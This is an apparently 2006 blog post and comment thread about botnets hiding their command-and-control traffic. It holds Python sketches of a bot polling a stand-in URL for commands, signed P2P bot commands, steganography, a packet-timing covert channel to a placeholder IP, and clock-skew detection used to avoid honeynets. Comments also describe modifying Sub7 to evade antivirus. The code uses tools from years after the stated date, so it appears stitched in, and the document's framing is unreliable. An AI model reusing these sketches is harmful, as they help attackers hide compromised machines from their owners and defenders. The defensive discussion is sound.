Hacker-Controlled Computers Hiding Better

If you have control of a network of computers—by infecting them with some sort of malware—the hard part is controlling that network. Traditionally, these computers (called zombies) are controlled via IRC. But IRC can be detected and blocked, so the hackers have adapted:

Instead of connecting to an IRC server, newly compromised PCs connect to one or more Web sites to check in with the hackers and get their commands. These Web sites are typically hosted on hacked servers or computers that have been online for a long time. Attackers upload the instructions for download by their bots.

As a result, protection mechanisms, such as blocking IRC traffic, will fail. This could mean that zombies, which so far have mostly been broadband-connected home computers, will be created using systems on business networks.
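To make the shift concrete, here is a minimal sketch of the kind of check-in loop such a bot might run (Python; the URL, interval, and command format are all hypothetical). To an egress filter it is indistinguishable from ordinary web browsing:

    # Minimal sketch of web-based command check-in; the URL, interval,
    # and command format are all hypothetical, for illustration only.
    import time
    import urllib.request

    COMMAND_URL = "http://example.com/innocuous-page.html"  # stand-in for a hacked server

    def fetch_command():
        # A plain HTTP GET on port 80 looks like ordinary web browsing,
        # so egress rules that block IRC never see anything unusual.
        with urllib.request.urlopen(COMMAND_URL, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace").strip()

    while True:
        try:
            cmd = fetch_command()
            print("received command:", cmd)  # a real bot would act on it
        except OSError:
            pass  # server unreachable; just try again later
        time.sleep(600)  # check in every ten minutes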

The trick here is to not let the computer’s legitimate owner know that someone else is controlling it. It’s an arms race between attacker and defender.

Posted on October 25, 2006 at 12:14 PM

Comments

Chase Venters October 25, 2006 12:51 PM

Frankly, I think these botnets are tremendously low-tech. I'm surprised I've never heard of anyone deploying a P2P network as the infection spreads and using PGP-signed commands, inserted at any point in the network, to control it.
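For what it's worth, the signed-command half of that idea is only a few lines. Here is a sketch using Ed25519 signatures via the Python "cryptography" package in place of PGP proper; the command string is made up:

    # Sketch of signature-checked bot commands; Ed25519 via the Python
    # "cryptography" package stands in for PGP proper. Command is made up.
    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.primitives.asymmetric.ed25519 import (
        Ed25519PrivateKey, Ed25519PublicKey,
    )

    # The herder generates this once; only the public half ships in the bot.
    herder_private = Ed25519PrivateKey.generate()
    herder_public = herder_private.public_key()

    def accept_command(cmd: bytes, sig: bytes, pub: Ed25519PublicKey) -> bool:
        # A node relays or executes a command only if the signature checks,
        # so commands can safely be injected at any point in the mesh.
        try:
            pub.verify(sig, cmd)
            return True
        except InvalidSignature:
            return False

    cmd = b"scan 10.0.0.0/8"
    sig = herder_private.sign(cmd)
    assert accept_command(cmd, sig, herder_public)
    assert not accept_command(b"tampered", sig, herder_public)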

Maybe the real answer is that programmers are lazy, and lazy people do just enough to get by.

Brian October 25, 2006 12:53 PM

It would be possible to set up a command-and-control system that used only SSL communication to popular web sites. For example, you could use a blog as the rendezvous point, with bot herders posting commands as blog entries and bots posting comments. There might be some scalability problems (could Blogger handle comments from 10,000 bots?), but it could be made to work.

I'm not sure what the next move for defenders would be at that point. You can't block it at the IP layer, because it's a major web site with lots of legit traffic. You can't filter for it, because it is encrypted. You might not even notice the bot at all, unless it starts to generate too much traffic.

It’s a challenge.

sam October 25, 2006 12:56 PM

Follow-up to the above comment: mix in some steganography and you have an interesting channel in play.
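As a toy illustration of that idea, here is a scheme that hides one command bit per line in the trailing whitespace of otherwise innocent-looking text (entirely hypothetical, and trivially destroyed by whitespace normalization):

    # Toy steganography: hide one payload bit per line in the trailing
    # whitespace of innocent-looking text. Illustration only; trivially
    # destroyed by whitespace normalization.
    def hide(cover_lines, payload: bytes):
        bits = "".join(f"{b:08b}" for b in payload)
        assert len(bits) <= len(cover_lines), "cover text too short"
        return [line + (" " if bit == "0" else "\t")
                for line, bit in zip(cover_lines, bits)] + cover_lines[len(bits):]

    def reveal(lines) -> bytes:
        bits = "".join("0" if l.endswith(" ") else "1"
                       for l in lines if l.endswith((" ", "\t")))
        return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))

    cover = [f"nice post, totally agree #{i}" for i in range(32)]
    assert reveal(hide(cover, b"ping")) == b"ping"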

Tanuki October 25, 2006 1:02 PM

Another reason for any sensible corporate sysadmin to impose egress filtering on unapproved ports. Using non-standard ports/protocols is really nothing new: it's always worth looking at what's going on on UDP/53, and if you're a backbone you'd be surprised at how much of it is definitely not DNS traffic.
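The UDP/53 check is easy to act on, because the DNS header has enough fixed structure that a crude sanity check catches most non-DNS traffic hiding on that port. A rough sketch, operating on raw UDP payloads you have already captured; the thresholds are guesses:

    # Crude "is this plausibly DNS?" check for captured UDP/53 payloads,
    # to spot tunnelled non-DNS traffic. Heuristic; thresholds are guesses.
    import struct

    def looks_like_dns(payload: bytes) -> bool:
        if len(payload) < 12:                 # DNS header is 12 bytes
            return False
        _id, flags, qd, an, ns, ar = struct.unpack("!6H", payload[:12])
        if (flags >> 11) & 0xF > 5:           # opcodes above 5 are unassigned
            return False
        if qd > 10 or an > 100 or ns > 100 or ar > 100:
            return False                      # absurd section counts
        return True

    # A well-formed query header passes; random bytes usually fail.
    query = (struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)
             + b"\x03www\x07example\x03com\x00\x00\x01\x00\x01")
    assert looks_like_dns(query)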

Anonymous October 25, 2006 1:06 PM

@brian, @sam

This could be happening already. It's virtually undetectable, so how would anyone know?

Bill Mill October 25, 2006 1:10 PM

@Tanuki

What do you mean, another reason to impose egress filtering? I think the point of the snippet is that the viruses are using port 80 to avoid egress filtering. Blocking users’ web access doesn’t seem to be much of a sensible option.

David October 25, 2006 1:16 PM

@Chase

I guess you haven't read any of the analysis of these "low-tech" botnets. They have some serious command-and-control features, and most of them don't phone home to a central site; they are quite decentralized. Some of them can even change modes of operation if the primary one fails over time.

Ran across one the other day and found that much of its administration is done through simple web forms that then distribute the information. It takes about 5 minutes to send a complete change of orders out to the C&C infrastructure.

It took me 2+ days to get one offending site taken down (a hidden iframe with a link to some nasty JavaScript). The linked site in Korea (with the JavaScript) is probably still running.

Brian October 25, 2006 1:50 PM

@Chase

Laziness is one of the three virtues of a programmer. The other two are Hubris and Impatience.

Clint October 25, 2006 2:10 PM

Anyone have any good 'modern' references on detecting bot traffic in a small business? Most of the stuff I've seen is a year or more old and basically says, "use Ethereal". I want to look for traffic from/to current bots. Surely there are tools out there to help spot this kind of traffic? (P.S. I love Ethereal, so don't get me wrong… I'd just like some better pointers on the type of traffic to look for in today's environment.)

moz October 25, 2006 3:20 PM

@brian

Connecting stunnel + htunnel + onion routing of some kind is barely even programming. Someone must have already done it ages ago.

It seems to me that the survival of creatures as vulnerable as these suggests that there are no predators in the botnet environment. David's comment about shutting down one PC (I bet they did shut it down and didn't try to trace the source, either) just backs this up.

I agree with Anonymous; more secure botnets probably do exist. We just aren't doing enough about the existing ones for their extra security to be an important advantage. When/if we do start to have an impact, bots will begin to evolve; only at that point are we likely to notice the higher-level ones. Think about botnets which actively detect and avoid honeypots, for example.

Anonymous October 25, 2006 3:22 PM

Talk about being behind the curve: who recalls Sub7? It still works with a few lines of code changed and defeats every major AV scanner (today). Change ports and you have a slave PC that will scan clean and yet is no longer yours. Add a modified .dat file to send bursts of data at random times, and who would notice?

There was a time when white hats and black hats were still on the same page; today the black hats are chapters ahead. IRC? Who the F… uses IRC today? But how many PCs use chat/IM? Big hole right there, isn't it? How about "updates" for AV or Windows? How many home users know what not to allow access to the 'net? Then you have all of those file-swapping programs; what's going on behind the scenes with all that traffic?
How about HTML emails? Talk about wide freakin' open to attacks. Add a firewall/AV killer that leaves the icon on the toolbar to fool the home user into thinking everything is just fine…

Thus we come back to the owner of the PC. We test users of the highways and roads, and yet the damage in dollars from an unchecked slave PC is scary. Laziness is one of the virtues of a home user.

So how long till the web asks for a license #?

Anonymous October 25, 2006 5:07 PM

@Chase

http://www.lurhq.com/sinit.html

This one does almost exactly what you describe: a P2P protocol on UDP port 53 (fairly easily detectable, though, as it doesn't disguise itself as legitimate DNS). Commands and files may be inserted anywhere in the system, and their signatures are checked against an RSA public key.

antimedia October 25, 2006 8:13 PM

I think Bruce’s point is that, as networks continue to tighten up, attackers are moving to the ports that can’t be closed. Their traffic, then, is a part of “normal” traffic and therefore harder to detect.

I think the right approach is traffic analysis. If you see connections of any kind to “strange” IPs, you investigate. If you see repeated traffic to certain IPs, especially when you can’t explain why the particular port is being used (no website at that address on port 80, for example), then you investigate.
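A toy version of that analysis is just aggregation over a flow log. Here is a sketch that assumes a simple CSV of (src, dst, dport) records; the format and threshold are made up:

    # Toy traffic analysis: flag hosts that repeatedly contact the same
    # outside (dst, port). Log format and threshold are hypothetical.
    import csv
    from collections import Counter

    REPEAT_THRESHOLD = 50  # flows per day to one destination before we look

    def suspicious_pairs(flow_log_path):
        counts = Counter()
        with open(flow_log_path, newline="") as f:
            for row in csv.DictReader(f):  # expects src,dst,dport columns
                counts[(row["src"], row["dst"], row["dport"])] += 1
        return [(pair, n) for pair, n in counts.most_common()
                if n >= REPEAT_THRESHOLD]

    if __name__ == "__main__":
        for (src, dst, dport), n in suspicious_pairs("flows.csv"):
            print(f"{src} -> {dst}:{dport}  {n} flows; investigate")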

As Bruce says, it’s an arms race.

Clive Robinson October 26, 2006 2:31 AM

It is unfortunately a numbers game, and I suspect that the sysadmins are going to lose in the long run. First, a few assumptions:

1) There will always be one or more protocols used on a network that can be exploited (Protocol weakness).

2) The majority of network protocols in use at any one time will have exploitable weaknesses in their implementations (Implementation weakness).

3) There will always be ways to implement anonymous communications.

4) Laws will not be enforceable in many cases due to political segmentation.

5) There will always be an incentive, be it monetary or ego, for people to exploit the above weaknesses.

Even if we nail the obvious weaknesses in the first two, the number of ways of implementing a covert, and therefore anonymous, communications channel is far beyond what we currently have the means to identify.

For instance, it is possible to communicate very successfully using variations in the latency of network packets, and other even more interesting types of side channels. I am not aware of any software out there that can even pick up such a system if it uses spread-spectrum techniques (think about the related field of digital watermarking if you want to read up on what is possible).
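As a baseline for how simple such a channel can be, before any spread-spectrum hiding, consider encoding each bit as the gap between two otherwise innocent packets. A sketch; the address and timing thresholds are made up:

    # Toy timing covert channel: each bit is the delay between two UDP
    # "heartbeat" packets (short gap = 0, long gap = 1). Deliberately
    # crude; a real channel would hide the modulation.
    import socket
    import time

    DEST = ("203.0.113.7", 9999)   # made-up receiver address
    SHORT, LONG = 0.2, 0.6         # seconds

    def send_bits(payload: bytes):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        for bit in "".join(f"{b:08b}" for b in payload):
            sock.sendto(b"ping", DEST)          # packet contents stay innocent
            time.sleep(SHORT if bit == "0" else LONG)
        sock.sendto(b"ping", DEST)              # closing edge for the last gap

    def decode_gaps(arrival_times):
        # Receiver side: threshold inter-arrival times back into bits.
        bits = "".join("0" if t2 - t1 < 0.4 else "1"
                       for t1, t2 in zip(arrival_times, arrival_times[1:]))
        return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))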

The solution is not to look for the comms; you are unlikely to find them except via a honeynet-type system.

There are two solutions to the problem:

A) Do not connect your systems to any communications network that is not fully under your control.

B) Have a reliable (and efficient) method of detecting what is running on each and every computer under your control, so that any "unknown" behaviour is picked up.

Although the first method is fairly easy to implement, the utility of such a network is limited from a business point of view.

As many people know, the state of play with regard to operating systems and their capabilities in this respect is not that good for the majority of computers.

Therefore I would expect this problem to continue for some time.

Oh, and as an aside, it would appear that computers used in honeynets can be detected by timing analysis of their responses to network packets, etc. The attack can easily be disguised to look like a "brain-dead script kiddie" network scan. So it is actually possible for an astute cracker to work out which networks have real service machines and which have fake service machines designed to act as a lure. Therefore they will avoid the honeynets with their latest exploits in order to improve their shelf life…

As was once said “May you live in interesting times…”

Steve October 26, 2006 4:57 AM

It seems fairly obvious that it is not possible for a zombie computer to perfectly imitate an innocent computer – because if it did, it wouldn't be sending any spam, or whatever it is that the bot herder wants it to do for him. So zombies can still be identified by the fact that they do malicious things, like participating in DDoS attacks, or sending spam. Hiding their communications cannot prevent this, so it seems to me that defenders don't have to participate in the arms race Bruce describes if they don't want to – detecting the malicious activity is more robust than detecting the comms. This is (loosely speaking) because there are external requirements on the malicious activity, whereas the comms mechanism is an implementation detail.

If a corporate network is relying on blocking the bot’s comms, then it is already in a world of trouble, because that defence only kicks in once the malicious code has already rooted one of their machines (I say rooted because otherwise a personal firewall would prevent the malware from communicating out at all, and there would be no need to block comms at the network level).

Comms-blocking defends you against “zombification”, but not against attacks designed to damage or steal your data. If vandal-style trojans can delete your data and take down your machines, then participating in a botnet may be the least of your worries. I’m assuming that vandals are still a significant part of the security threat landscape, which may be a mistake.

The problem here seems to be that one layer of a deep defence is failing. As always with deep defences, if the failure of one layer is the difference between security success and security failure (the article suggests this by saying that the reason there aren’t zombies on corporate systems already is that IRC is generally blocked on corporate networks), then you’ve left it too late to worry about…

The response to the inability to block botnet commands, from the POV of corporate IT, doesn’t need to be to improve the ability to detect botnet communications. They could instead improve (or invent) other layers in the system.

Steve October 26, 2006 5:00 AM

@Clive Robinson

“Therefore they will avoid the Honeynets with their latest exploits in order to improve their shelf life…”

Is this just a theoretical defence against Honeynets, or has it been demonstrated in principle / observed in the wild?

Clive Robinson October 26, 2006 7:52 AM

@steve,

"Is this just a theoretical defence against Honeynets, or has it been demonstrated in principle / observed in the wild?"

Has somebody done it and shown it to work on a limited network? Yes.

Have they written up a paper about it? No (though they might; I will have to check with them).

As for in the wild, I am not sure anybody has gone looking for this class of attack yet.

By the way, it is a series of attacks, not just a single attack. They are variations on different "side channel" attacks based on using the available timing information from the target machine, both timestamps and other visible effects in timing.

I will describe one attack, which will work from just about anywhere on the Internet against a honeynet machine which has multiple OSes and IP addresses hosted on it.

First I will give you the background on it, so you can find the info to Do It Yourself, as it were.

About a year and two-thirds ago, Bruce blogged about "Remote Physical Device Fingerprinting":

http://www.schneier.com/blog/archives/2005/03/remote_physical.html

The article on which it was based is available from:

http://www.cse.ucsd.edu/users/tkohno/papers/PDF/

At the time, I commented that:

"This 'attack' is a form of TEMPEST attack, and the old adage about information 'energy and bandwidth' applies. Interestingly, looking at their paper, they have missed a couple of things that might provide more information about the computer. Basically, the resonant frequency of an XTAL oscillator is decided by the electrical and physical characteristics of the circuit. This means that the frequency changes with the applied voltage, temperature, and mechanical vibration. So if there is sufficient bandwidth in the time-detection method, it might well be possible to tell things about the environment the laptop is in and how much it is being used (heavy calculation takes the temperature up and drops the power-supply voltage slightly)."

I also made a couple of suggestions for a quick hardware fix, from which you can see that I had given some thought to the problem. One item I did not really go into further was:

"heavy calculation takes the temperature up"

This was independently taken up by a couple of people at the Cambridge Computer Laboratory, who developed it into an attack against anonymity servers such as Tor's in their paper:

http://www.cl.cam.ac.uk/~rnc1/anonroute.pdf

Although they considered the use of systems with two IP addresses in the box, they did not expand on the idea any further.

Well, one of the problems with honeynets is the need to look real in a cost-efficient manner, while also ensuring the machines do not send uncontrolled data out to the Internet.

The easy solution is to host multiple OSes and IPs on a single host, or to use an OS that responds to multiple IP addresses. The box has one or more network cards that are on the honeynet. The box is also unused by any real user, to address the issue of Internet traffic originating from the box; this is important, as a new attack might only become visible after it has worked and starts sending requests back out to the Internet.

Well, on such a machine, the one thing that remains in common is its system clock, or XTAL; any drift in this is identically observable on all the IP addresses and network cards.

As a cracker, all you need to do is get the timing information from a range of IP addresses on the target and cross-correlate them with each other. Those that show identical skew or other effects are, with high probability, the same machine.
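A sketch of that cross-correlation step, assuming you have already harvested (local time, remote TCP timestamp) samples per IP with a capture tool; the nominal tick rate and grouping tolerance are guesses:

    # Sketch of the cross-correlation: estimate per-IP clock skew from
    # (local time, remote TCP timestamp) samples, then group IPs whose
    # skews match. Nominal 1000 Hz tick rate and tolerance are guesses.
    def skew_ppm(samples):
        # Least-squares slope of remote ticks versus local seconds; the
        # deviation of the slope from nominal is the clock skew.
        n = len(samples)
        sx = sum(t for t, _ in samples)
        sy = sum(v for _, v in samples)
        sxx = sum(t * t for t, _ in samples)
        sxy = sum(t * v for t, v in samples)
        slope = (n * sxy - sx * sy) / (n * sxx - sx * sx)  # ticks per second
        return (slope / 1000.0 - 1.0) * 1e6

    def group_by_skew(skews, tol_ppm=1.0):
        # skews: {ip: skew estimate}. IPs within tolerance of each other
        # probably share one physical crystal, i.e. one honeynet box.
        if not skews:
            return []
        ordered = sorted(skews.items(), key=lambda kv: kv[1])
        groups, current = [], [ordered[0]]
        for ip, s in ordered[1:]:
            if s - current[-1][1] <= tol_ppm:
                current.append((ip, s))
            else:
                groups.append(current)
                current = [(ip, s)]
        groups.append(current)
        return [[ip for ip, _ in g] for g in groups if len(g) > 1]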

If there are just one or two IPs with the same skew in a range of IP addresses, then it might be a real working network in, say, a software-development environment.

However, if there are a significant number, then there is a reasonable chance it's a honeynet or other similar network. As a "wily cracker" you will treat it like a bag of snakes and go somewhere else.

You can do other types of timing attack to achieve similar results.

You can also use the same technique to identify individual machines behind certain types of load sharing system.

Why would you want to do this? Well, imagine you are a small company using a hosting company to put your web site up. You write secure web code and do reasonable testing, so it's not really a problem.

However, the hosting company, to better utilise resources, puts several other web sites on the same box, and they might not be as secure. Even if they say they don't or won't, at some time or another there is a chance they will, just to maintain service. Several hosting companies are known to do this when there are "technical difficulties," in order to maintain continuity of service and avoid taking SLA penalties (often it's in the paperwork, right down in the fine print).

A cracker might then be able to find a poorly written web site on the same box as your web site, get a toehold into the server box, and then escalate their way into your secure web site to get at your data or other information.

Clive Robinson October 26, 2006 8:04 AM

@Steve,

I forgot to mention: in the papers I linked to, the implication is that you have to take a lot of timing measurements to get reliable data. That is true for the attacks they outline.

However, for the attack I have outlined you are cross-correlating timings against each other. You will need a lot less data to get an indication, as small changes appear on all the IP addresses at the same time.

So in practice you launch what appears to be a brain-dead network scan against your chosen target, go away and do your cross-correlation at leisure, then go back and do it again in a more stealthy manner to check your suspicions.

Most honeynet operators are going to ignore a brain-dead network scan as being by a "script kiddie" and not worthy of interest…
